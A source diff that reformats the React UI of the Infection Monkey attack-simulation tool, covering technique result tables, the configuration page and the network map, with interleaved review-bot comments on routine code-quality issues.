@@ -13,15 +13,23 @@ class T1110 extends React.Component { static getServiceColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 160}, - {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: { 'whiteSpace': 'unset' }, width: 100}, - {Header: 'Started', id: 'started', accessor: x => x.info.started, style: { 'whiteSpace': 'unset' }}, - {Header: 'Finished', id: 'finished', accessor: x => x.info.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Attempts', id: 'attempts', accessor: x => x.attempt_cnt, style: { 'whiteSpace': 'unset' }, width: 160}, - {Header: 'Successful credentials', id: 'credentials', accessor: x => this.renderCreds(x.successful_creds), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 160 + }, + {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: {'whiteSpace': 'unset'}, width: 100}, + {Header: 'Started', id: 'started', accessor: x => x.info.started, style: {'whiteSpace': 'unset'}}, + {Header: 'Finished', id: 'finished', accessor: x => x.info.finished, style: {'whiteSpace': 'unset'}}, + {Header: 'Attempts', id: 'attempts', accessor: x => x.attempt_cnt, style: {'whiteSpace': 'unset'}, width: 160}, + { + Header: 'Successful credentials', + id: 'credentials', + accessor: x => this.renderCreds(x.successful_creds), + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; static renderCreds(creds) { return {creds.map(cred =>
{cred}
)}
diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js index 64db13f81..cd19be877 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js @@ -16,10 +16,10 @@ class T1129 extends React.Component {
{this.props.data.dlls.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js index 641602dc5..2383a0bcc 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1145 extends React.Component { @@ -10,11 +10,11 @@ class T1145 extends React.Component { super(props); } - static renderSSHKeys(keys){ + static renderSSHKeys(keys) { let output = []; - keys.forEach(function(keyInfo){ - output.push(
- SSH key pair used by {keyInfo['name']} user found in {keyInfo['home_dir']}
) + keys.forEach(function (keyInfo) { + output.push(
+ SSH key pair used by {keyInfo['name']} user found in {keyInfo['home_dir']}
) }); return (
{output}
); } @@ -22,16 +22,21 @@ class T1145 extends React.Component { static getKeysInfoColumns() { return ([{ columns: [ - {Header: 'Machine', + { + Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), - style: { 'whiteSpace': 'unset' }}, - {Header: 'Keys found', + style: {'whiteSpace': 'unset'} + }, + { + Header: 'Keys found', id: 'keys', accessor: x => T1145.renderSSHKeys(x.ssh_info), - style: { 'whiteSpace': 'unset' }}, - ] - }])}; + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; render() { return ( @@ -40,10 +45,10 @@ class T1145 extends React.Component {
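Review bot: `renderSSHKeys` in the @@ -10,11 +10,11 @@ hunk still fills a mutable `output` array with `keys.forEach(...)` + `output.push(...)`, while `renderCreds` in T1110.js, reformatted in this same commit, uses `creds.map(cred => ...)`; `return keys.map(keyInfo => (...))` wrapped in the same container would make the two consistent and drop the temporary array. Each element pushed here is rendered as part of a list, so it presumably needs a stable `key` prop — the JSX is not fully visible in this view, so confirm one is set. Only the reformat touched these lines, so this is a follow-up rather than a blocker.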
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js index 31be117a9..acddac84a 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1188 extends React.Component { @@ -14,20 +14,27 @@ class T1188 extends React.Component { return ([{ Header: "Communications through multi-hop proxies", columns: [ - {Header: 'From', + { + Header: 'From', id: 'from', accessor: x => renderMachineFromSystemData(x.from), - style: { 'whiteSpace': 'unset' }}, - {Header: 'To', + style: {'whiteSpace': 'unset'} + }, + { + Header: 'To', id: 'to', accessor: x => renderMachineFromSystemData(x.to), - style: { 'whiteSpace': 'unset' }}, - {Header: 'Hops', + style: {'whiteSpace': 'unset'} + }, + { + Header: 'Hops', id: 'hops', accessor: x => x.count, - style: { 'whiteSpace': 'unset' }}, - ] - }])}; + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; render() { return ( @@ -36,10 +43,10 @@ class T1188 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js index 8dc655aee..d82f51e3a 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js @@ -1,37 +1,43 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine } from "./Helpers" +import {renderMachine} from "./Helpers" class T1210 extends React.Component { constructor(props) { super(props); - this.columns = [ {Header: 'Machine', - id: 'machine', accessor: x => renderMachine(x), - style: { 'whiteSpace': 'unset' }, - width: 200}, - {Header: 'Time', - id: 'time', accessor: x => x.time, - style: { 'whiteSpace': 'unset' }, - width: 170}, - {Header: 'Usage', - id: 'usage', accessor: x => x.usage, - style: { 'whiteSpace': 'unset' }} - ] + this.columns = [{ + Header: 'Machine', + id: 'machine', accessor: x => renderMachine(x), + style: {'whiteSpace': 'unset'}, + width: 200 + }, + { + Header: 'Time', + id: 'time', accessor: x => x.time, + style: {'whiteSpace': 'unset'}, + width: 170 + }, + { + Header: 'Usage', + id: 'usage', accessor: x => x.usage, + style: {'whiteSpace': 'unset'} + } + ] } - renderExploitedMachines(){ - if (this.props.data.bits_jobs.length === 0){ - return (
) + renderExploitedMachines() { + if (this.props.data.bits_jobs.length === 0) { + return (
) } else { return () + columns={this.columns} + data={this.props.data.bits_jobs} + showPagination={false} + defaultPageSize={this.props.data.bits_jobs.length} + />) } } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js index 9b6266efa..2a66d97bb 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine } from "./Helpers" +import {renderMachine} from "./Helpers" class T1210 extends React.Component { 
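Review bot: The class reformatted in the @@ -1,37 +1,43 @@ hunk of T1197.js is still declared as `class T1210 extends React.Component`, the same name as the class in T1210.js later in this commit. Since the constructor and `renderExploitedMachines` were rewritten here anyway, `class T1197 extends React.Component` would make the file self-describing and stop the two techniques from being confused in stack traces and dev-tools. The export at the bottom of the file is outside the hunk, so check that nothing imports the class by its current name before renaming.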
@@ -14,40 +14,52 @@ class T1210 extends React.Component { return ([{ Header: "Found services", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 200}, - {Header: 'Time', id: 'time', accessor: x => x.time, style: { 'whiteSpace': 'unset' }}, - {Header: 'Port', id: 'port', accessor: x =>x.service.port, style: { 'whiteSpace': 'unset' }, width: 100}, - {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: { 'whiteSpace': 'unset' }} - ] - }])} + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 200 + }, + {Header: 'Time', id: 'time', accessor: x => x.time, style: {'whiteSpace': 'unset'}}, + {Header: 'Port', id: 'port', accessor: x => x.service.port, style: {'whiteSpace': 'unset'}, width: 100}, + {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: {'whiteSpace': 'unset'}} + ] + }]) + } static getExploitColumns() { return ([{ Header: "Exploited services", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 200}, - {Header: 'Time', id: 'time', accessor: x => x.time, style: { 'whiteSpace': 'unset' }}, - {Header: 'Port/url', id: 'port', accessor: x =>this.renderEndpoint(x.service), style: { 'whiteSpace': 'unset' }, - width: 170}, - {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: { 'whiteSpace': 'unset' }} - ] - }])}; + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 200 + }, + {Header: 'Time', id: 'time', accessor: x => x.time, style: {'whiteSpace': 'unset'}}, + { + Header: 'Port/url', id: 'port', accessor: x => this.renderEndpoint(x.service), style: {'whiteSpace': 'unset'}, + width: 170 + }, + {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: {'whiteSpace': 
'unset'}} + ] + }]) + }; - static renderEndpoint(val){ + static renderEndpoint(val) { return ( {(val.vulnerable_urls.length !== 0 ? val.vulnerable_urls[0] : val.vulnerable_ports[0])} ) }; - static formatScanned(data){ + static formatScanned(data) { let result = []; - for(let service in data.machine.services){ - let scanned_service = {'machine': data.machine, - 'time': data.time, - 'service': {'port': [data.machine.services[service].port], - 'display_name': data.machine.services[service].display_name}}; + for (let service in data.machine.services) { + let scanned_service = { + 'machine': data.machine, + 'time': data.time, + 'service': { + 'port': [data.machine.services[service].port], + 'display_name': data.machine.services[service].display_name + } + }; result.push(scanned_service) } return result @@ -58,10 +70,10 @@ class T1210 extends React.Component {

) } @@ -71,10 +83,10 @@ class T1210 extends React.Component {

) } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js index 712512bcb..4162196a5 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1222 extends React.Component { @@ -14,10 +14,11 @@ class T1222 extends React.Component { return ([{ Header: "Permission modification commands", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Command', id: 'command', accessor: x => x.command, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: {'whiteSpace': 'unset'}}, + {Header: 'Command', id: 'command', accessor: x => x.command, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -26,10 +27,10 @@ class T1222 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""}
); diff --git a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js index e06043c20..06223bba1 100644 --- a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js +++ b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js @@ -84,14 +84,14 @@ class InfMapPreviewPaneComponent extends PreviewPaneComponent { unescapeLog(st) { return st.substr(1, st.length - 2) // remove quotation marks on beginning and end of string. - .replace(/\\n/g, "\n") - .replace(/\\r/g, "\r") - .replace(/\\t/g, "\t") - .replace(/\\b/g, "\b") - .replace(/\\f/g, "\f") - .replace(/\\"/g, '\"') - .replace(/\\'/g, "\'") - .replace(/\\&/g, "\&"); + .replace(/\\n/g, "\n") + .replace(/\\r/g, "\r") + .replace(/\\t/g, "\t") + .replace(/\\b/g, "\b") + .replace(/\\f/g, "\f") + .replace(/\\"/g, '\"') + .replace(/\\'/g, "\'") + .replace(/\\&/g, "\&"); } downloadLog(asset) { diff --git a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js index 327d77061..3ef3ab76d 100644 --- a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js +++ b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js @@ -92,14 +92,14 @@ class PreviewPaneComponent extends AuthComponent { unescapeLog(st) { return st.substr(1, st.length - 2) // remove quotation marks on beginning and end of string. - .replace(/\\n/g, "\n") - .replace(/\\r/g, "\r") - .replace(/\\t/g, "\t") - .replace(/\\b/g, "\b") - .replace(/\\f/g, "\f") - .replace(/\\"/g, '\"') - .replace(/\\'/g, "\'") - .replace(/\\&/g, "\&"); + .replace(/\\n/g, "\n") + .replace(/\\r/g, "\r") + .replace(/\\t/g, "\t") + .replace(/\\b/g, "\b") + .replace(/\\f/g, "\f") + .replace(/\\"/g, '\"') + .replace(/\\'/g, "\'") + .replace(/\\&/g, "\&"); } downloadLog(asset) { 
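Review bot: `unescapeLog` in InfMapPreviewPane.js (@@ -84,14 +84,14 @@) is byte-identical to the one in PreviewPane.js (@@ -92,14 +92,14 @@) after the re-indent, and the hunk header shows `InfMapPreviewPaneComponent extends PreviewPaneComponent`, so the subclass override adds nothing; deleting it from InfMapPreviewPane.js leaves one copy to maintain. In both, `st.substr(1, st.length - 2)` strips the first and last character whether or not they are the quotation marks the comment describes, so a guard such as `if (!(st.startsWith('"') && st.endsWith('"'))) return st;` before the chain would avoid clipping an unquoted log line. The replacement strings `'\"'` and `"\&"` are just `"` and `&`; writing them as `'"'` and `"&"` says the same thing without the no-op escapes.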
diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index 43dac797c..9b9be2340 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js @@ -3,7 +3,7 @@ import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; import fileDownload from 'js-file-download'; import AuthComponent from '../AuthComponent'; -import { FilePond } from 'react-filepond'; +import {FilePond} from 'react-filepond'; import 'filepond/dist/filepond.min.css'; import MatrixComponent from "../attack/MatrixComponent"; @@ -37,7 +37,7 @@ class ConfigurePageComponent extends AuthComponent { }; } - getUiSchemas(){ + getUiSchemas() { return ({ basic: {"ui:order": ["general", "credentials"]}, basic_network: {}, @@ -94,8 +94,11 @@ class ConfigurePageComponent extends AuthComponent { this.setInitialConfig(monkeyConfig.configuration); this.setInitialAttackConfig(attackConfig.configuration); for (let sectionKey of this.sectionsOrder) { - if (sectionKey === 'attack') {sections.push({key:sectionKey, title: "ATT&CK"})} - else {sections.push({key: sectionKey, title: monkeyConfig.schema.properties[sectionKey].title});} + if (sectionKey === 'attack') { + sections.push({key: sectionKey, title: "ATT&CK"}) + } else { + sections.push({key: sectionKey, title: monkeyConfig.schema.properties[sectionKey].title}); + } } this.setState({ schema: monkeyConfig.schema, 
@@ -110,15 +113,15 @@ class ConfigurePageComponent extends AuthComponent { updateConfig = () => { this.authFetch(CONFIG_URL) - .then(res => res.json()) - .then(data => { - this.setInitialConfig(data.configuration); - this.setState({configuration: data.configuration}) - }) + .then(res => res.json()) + .then(data => { + this.setInitialConfig(data.configuration); + this.setState({configuration: data.configuration}) + }) }; onSubmit = () => { - if (this.state.selectedSection === 'attack'){ + if (this.state.selectedSection === 'attack') { this.matrixSubmit() } else { this.configSubmit() @@ -134,13 +137,14 @@ class ConfigurePageComponent extends AuthComponent { body: JSON.stringify(this.state.attackConfig) }) .then(res => { - if (!res.ok) - { + if (!res.ok) { throw Error() } return res; }) - .then(() => {this.setInitialAttackConfig(this.state.attackConfig);}) + .then(() => { + this.setInitialAttackConfig(this.state.attackConfig); + }) .then(this.updateConfig()) .then(this.setState({lastAction: 'saved'})) .catch(error => { 
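Review bot: In the @@ -134,13 +137,14 @@ hunk the context lines `.then(this.updateConfig())` and `.then(this.setState({lastAction: 'saved'}))` call both methods immediately while the promise chain is being built and pass their return values (undefined) to `.then`, so the config refresh and the 'saved' status happen before the POST has completed and even when the `throw Error()` branch above fires. They should be thunks: `.then(() => this.updateConfig())` and `.then(() => this.setState({lastAction: 'saved'}))`. The enclosing submit method starts before this hunk and its `.catch` continues past it, so the ordering of the status updates in that handler should be checked at the same time.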
@@ -162,28 +166,28 @@ class ConfigurePageComponent extends AuthComponent { this.setInitialConfig(res.configuration); this.props.onStatusChange(); }).catch(error => { - console.log('bad configuration'); - this.setState({lastAction: 'invalid_configuration'}); - }); + console.log('bad configuration'); + this.setState({lastAction: 'invalid_configuration'}); + }); }; // Alters attack configuration when user toggles technique - attackTechniqueChange = (technique, value, mapped=false) => { + attackTechniqueChange = (technique, value, mapped = false) => { // Change value in attack configuration // Go trough each column in matrix, searching for technique Object.entries(this.state.attackConfig).forEach(techType => { - if(techType[1].properties.hasOwnProperty(technique)){ + if (techType[1].properties.hasOwnProperty(technique)) { let tempMatrix = this.state.attackConfig; tempMatrix[techType[0]].properties[technique].value = value; this.setState({attackConfig: tempMatrix}); // Toggle all mapped techniques - if (! mapped ){ + if (!mapped) { // Loop trough each column and each row Object.entries(this.state.attackConfig).forEach(otherType => { Object.entries(otherType[1].properties).forEach(otherTech => { // If this technique depends on a technique that was changed - if (otherTech[1].hasOwnProperty('depends_on') && otherTech[1]['depends_on'].includes(technique)){ + if (otherTech[1].hasOwnProperty('depends_on') && otherTech[1]['depends_on'].includes(technique)) { this.attackTechniqueChange(otherTech[0], value, true) } }) @@ -207,41 +211,47 @@ class ConfigurePageComponent extends AuthComponent { }; renderAttackAlertModal = () => { - return ( {this.setState({showAttackAlert: false})}}> - -
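Review bot: `attackTechniqueChange` in the @@ -162,28 +166,28 @@ hunk does `let tempMatrix = this.state.attackConfig;` and then writes `tempMatrix[techType[0]].properties[technique].value = value`, which mutates the current state object in place before `setState` is called; React does not track in-place mutation, and because `userChangedMatrix` compares `this.state.attackConfig` with `this.initialAttackConfig` via `JSON.stringify`, the comparison can never see a change if `setInitialAttackConfig` (outside this hunk) keeps the same object reference — that part is inferred, since the setter is not visible here. Taking a copy first, for example `let tempMatrix = JSON.parse(JSON.stringify(this.state.attackConfig));`, mirrors the serialisation the file already relies on and keeps the previous state immutable. The recursive call for dependent techniques also reads `this.state.attackConfig` again after `setState`, which is asynchronous, so the copy should be threaded through rather than re-read.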

Warning

-

- You have unsubmitted changes. Submit them before proceeding. -

-
- -
-
-
) + return ( { + this.setState({showAttackAlert: false}) + }}> + +

+
Warning
+

+

+ You have unsubmitted changes. Submit them before proceeding. +

+
+ +
+
+
) }; - userChangedConfig(){ - if(JSON.stringify(this.state.configuration) === JSON.stringify(this.initialConfig)){ - if(Object.keys(this.currentFormData).length === 0 || - JSON.stringify(this.initialConfig[this.currentSection]) === JSON.stringify(this.currentFormData)){ + userChangedConfig() { + if (JSON.stringify(this.state.configuration) === JSON.stringify(this.initialConfig)) { + if (Object.keys(this.currentFormData).length === 0 || + JSON.stringify(this.initialConfig[this.currentSection]) === JSON.stringify(this.currentFormData)) { return false; } } return true; } - userChangedMatrix(){ + userChangedMatrix() { return (JSON.stringify(this.state.attackConfig) !== JSON.stringify(this.initialAttackConfig)) } setSelectedSection = (key) => { if ((key === 'attack' && this.userChangedConfig()) || - (this.currentSection === 'attack' && this.userChangedMatrix())){ + (this.currentSection === 'attack' && this.userChangedMatrix())) { this.setState({showAttackAlert: true}); return; } @@ -270,9 +280,11 @@ class ConfigurePageComponent extends AuthComponent { this.setInitialConfig(res.configuration); this.props.onStatusChange(); }); - this.authFetch(ATTACK_URL,{ method: 'POST', - headers: {'Content-Type': 'application/json'}, - body: JSON.stringify('reset_attack_matrix')}) + this.authFetch(ATTACK_URL, { + method: 'POST', + headers: {'Content-Type': 'application/json'}, + body: JSON.stringify('reset_attack_matrix') + }) .then(res => res.json()) .then(res => { this.setState({attackConfig: res.configuration}); 
@@ -280,16 +292,18 @@ class ConfigurePageComponent extends AuthComponent { }) }; - removePBAfiles(){ + removePBAfiles() { // We need to clean files from widget, local state and configuration (to sync with bac end) - if (this.PBAwindowsPond !== null){ + if (this.PBAwindowsPond !== null) { this.PBAwindowsPond.removeFile(); } - if (this.PBAlinuxPond !== null){ + if (this.PBAlinuxPond !== null) { this.PBAlinuxPond.removeFile(); } - let request_options = {method: 'DELETE', - headers: {'Content-Type': 'text/plain'}}; + let request_options = { + method: 'DELETE', + headers: {'Content-Type': 'text/plain'} + }; this.authFetch('/api/fileUpload/PBAlinux', request_options); this.authFetch('/api/fileUpload/PBAwindows', request_options); this.setState({PBAlinuxFile: [], PBAwinFile: []}); @@ -300,9 +314,12 @@ class ConfigurePageComponent extends AuthComponent { this.setState({ configuration: JSON.parse(event.target.result), lastAction: 'import_success' - }, () => {this.sendConfig(); this.setInitialConfig(JSON.parse(event.target.result))}); + }, () => { + this.sendConfig(); + this.setInitialConfig(JSON.parse(event.target.result)) + }); this.currentFormData = {}; - } catch(SyntaxError) { + } catch (SyntaxError) { this.setState({lastAction: 'import_failure'}); } }; @@ -315,18 +332,17 @@ class ConfigurePageComponent extends AuthComponent { sendConfig() { return ( this.authFetch('/api/configuration/island', - { - method: 'POST', - headers: {'Content-Type': 'application/json'}, - body: JSON.stringify(this.state.configuration) - }) - .then(res => { - if (!res.ok) { - throw Error() - } - return res; - }).catch(error => { + method: 'POST', + headers: {'Content-Type': 'application/json'}, + body: JSON.stringify(this.state.configuration) + }) + .then(res => { + if (!res.ok) { + throw Error() + } + return res; + }).catch(error => { console.log('bad configuration'); this.setState({lastAction: 'invalid_configuration'}); })); 
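Review bot: In the @@ -280,16 +292,18 @@ hunk the two `this.authFetch('/api/fileUpload/...', request_options)` DELETE calls discard their promises, so a failed deletion is neither logged nor reflected in the UI, while `this.setState({PBAlinuxFile: [], PBAwinFile: []})` on the next line clears the local state unconditionally. Clearing the state in a `.then` on the chained requests, or at least adding a `.catch` that sets `lastAction` the way `sendConfig` does, would keep the widget and the server in agreement. The rest of `removePBAfiles` continues past the hunk.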
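Review bot: The changed line `} catch (SyntaxError) {` in the @@ -300,9 +314,12 @@ hunk names its catch parameter `SyntaxError`, which shadows the global and binds whatever was thrown — it does not restrict the handler to JSON parse errors, so any exception raised inside the `try` is reported as 'import_failure'. `} catch (err) {` with `if (!(err instanceof SyntaxError)) throw err;` as the first statement would make the intended scope explicit. `JSON.parse(event.target.result)` is also evaluated twice in this block; parsing once into a local and reusing it removes the duplicate work. The start of this import handler is outside the hunk.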
@@ -355,12 +371,13 @@ class ConfigurePageComponent extends AuthComponent { PBAwindows = () => { return ( { @@ -374,12 +391,13 @@ class ConfigurePageComponent extends AuthComponent { PBAlinux = () => { return ( { @@ -391,23 +409,23 @@ class ConfigurePageComponent extends AuthComponent { />) }; - getWinPBAfile(){ - if (this.state.PBAwinFile.length !== 0){ + getWinPBAfile() { + if (this.state.PBAwinFile.length !== 0) { return ConfigurePageComponent.getMockPBAfile(this.state.PBAwinFile[0]) - } else if (this.state.configuration.monkey.behaviour.PBA_windows_filename){ + } else if (this.state.configuration.monkey.behaviour.PBA_windows_filename) { return ConfigurePageComponent.getFullPBAfile(this.state.configuration.monkey.behaviour.PBA_windows_filename) } } - getLinuxPBAfile(){ - if (this.state.PBAlinuxFile.length !== 0){ + getLinuxPBAfile() { + if (this.state.PBAlinuxFile.length !== 0) { return ConfigurePageComponent.getMockPBAfile(this.state.PBAlinuxFile[0]) } else if (this.state.configuration.monkey.behaviour.PBA_linux_filename) { return ConfigurePageComponent.getFullPBAfile(this.state.configuration.monkey.behaviour.PBA_linux_filename) } } - static getFullPBAfile(filename){ + static getFullPBAfile(filename) { return [{ source: filename, options: { @@ -416,7 +434,7 @@ class ConfigurePageComponent extends AuthComponent { }]; } - static getMockPBAfile(mockFile){ + static getMockPBAfile(mockFile) { let pbaFile = [{ source: mockFile.name, options: { @@ -437,39 +455,39 @@ class ConfigurePageComponent extends AuthComponent { renderConfigContent = (displayedSchema) => { return (
- {this.renderBasicNetworkWarning()} -
- -
-
) + {this.renderBasicNetworkWarning()} +
+ +
+
) }; renderRunningMonkeysWarning = () => { return (
- { this.state.allMonkeysAreDead ? - '' : -
- - Some monkeys are currently running. Note that changing the configuration will only apply to new - infections. -
- } -
) + {this.state.allMonkeysAreDead ? + '' : +
+ + Some monkeys are currently running. Note that changing the configuration will only apply to new + infections. +
+ } + ) }; renderBasicNetworkWarning = () => { - if (this.state.selectedSection === 'basic_network'){ + if (this.state.selectedSection === 'basic_network') { return (
- - The Monkey scans its subnet if "Local network scan" is ticked. Additionally the monkey scans machines - according to its range class. -
) + + The Monkey scans its subnet if "Local network scan" is ticked. Additionally the monkey scans machines + according to its range class. + ) } else { - return (
) + return (
) } }; @@ -477,8 +495,8 @@ class ConfigurePageComponent extends AuthComponent { return () + {this.state.sections.map(section => {section.title})} + ) }; render() { @@ -488,9 +506,9 @@ class ConfigurePageComponent extends AuthComponent { displayedSchema['definitions'] = this.state.schema['definitions']; } let content = ''; - if (this.state.selectedSection === 'attack' && Object.entries(this.state.attackConfig).length !== 0 ) { + if (this.state.selectedSection === 'attack' && Object.entries(this.state.attackConfig).length !== 0) { content = this.renderMatrix() - } else if(this.state.selectedSection !== 'attack') { + } else if (this.state.selectedSection !== 'attack') { content = this.renderConfigContent(displayedSchema) } return ( @@ -498,8 +516,8 @@ class ConfigurePageComponent extends AuthComponent { {this.renderAttackAlertModal()}

Monkey Configuration

{this.renderNav()} - { this.renderRunningMonkeysWarning()} - { content } + {this.renderRunningMonkeysWarning()} + {content}
- +
- { this.state.lastAction === 'reset' ? + {this.state.lastAction === 'reset' ?
Configuration reset successfully.
: ''} - { this.state.lastAction === 'saved' ? + {this.state.lastAction === 'saved' ?
Configuration saved successfully.
: ''} - { this.state.lastAction === 'import_failure' ? + {this.state.lastAction === 'import_failure' ?
Failed importing configuration. Invalid config file.
: ''} - { this.state.lastAction === 'invalid_configuration' ? + {this.state.lastAction === 'invalid_configuration' ?
An invalid configuration file was imported or submitted.
: ''} - { this.state.lastAction === 'import_success' ? + {this.state.lastAction === 'import_success' ?
Configuration imported successfully. diff --git a/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js b/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js index b7a2ec077..3abd1682c 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js @@ -18,8 +18,8 @@ class LicensePageComponent extends React.Component {

License

- Copyright 2017 Guardicore Ltd. -
+ Copyright 2017 Guardicore Ltd. +
Licensed under GPLv3.

diff --git a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js index 4d074c835..779a3c894 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js @@ -52,7 +52,7 @@ class MapPageComponent extends AuthComponent { }; updateTelemetryFromServer = () => { - this.authFetch('/api/telemetry-feed?timestamp='+this.state.telemetryLastTimestamp) + this.authFetch('/api/telemetry-feed?timestamp=' + this.state.telemetryLastTimestamp) .then(res => res.json()) .then(res => { let newTelem = this.state.telemetry.concat(res['telemetries']); @@ -71,8 +71,7 @@ class MapPageComponent extends AuthComponent { this.authFetch('/api/netmap/node?id=' + event.nodes[0]) .then(res => res.json()) .then(res => this.setState({selected: res, selectedType: 'node'})); - } - else if (event.edges.length === 1) { + } else if (event.edges.length === 1) { let displayedEdge = this.state.graph.edges.find( function (edge) { return edge['id'] === event.edges[0]; @@ -84,8 +83,7 @@ class MapPageComponent extends AuthComponent { .then(res => res.json()) .then(res => this.setState({selected: res.edge, selectedType: 'edge'})); } - } - else { + } else { this.setState({selected: null, selectedType: null}); } } @@ -100,7 +98,9 @@ class MapPageComponent extends AuthComponent { return ( this.setState({showKillDialog: false})}> -
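Review bot: The reformatted line `this.authFetch('/api/telemetry-feed?timestamp=' + this.state.telemetryLastTimestamp)` in the @@ -52,7 +52,7 @@ hunk still splices the timestamp into the query string unencoded. The value comes from component state and is presumably server-supplied, but `'/api/telemetry-feed?timestamp=' + encodeURIComponent(this.state.telemetryLastTimestamp)` costs nothing and keeps the request well-formed if the timestamp format ever includes characters such as `+` or `:`. The method continues past the hunk.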

Are you sure you want to kill all monkeys?

+

+
Are you sure you want to kill all monkeys?
+

This might take a few moments...

@@ -153,15 +153,15 @@ class MapPageComponent extends AuthComponent {
Legend: - Exploit + Exploit | - Scan + Scan | - Tunnel + Tunnel | - Island Communication + Island Communication
- { this.renderTelemetryConsole() } + {this.renderTelemetryConsole()}
@@ -174,7 +174,8 @@ class MapPageComponent extends AuthComponent {
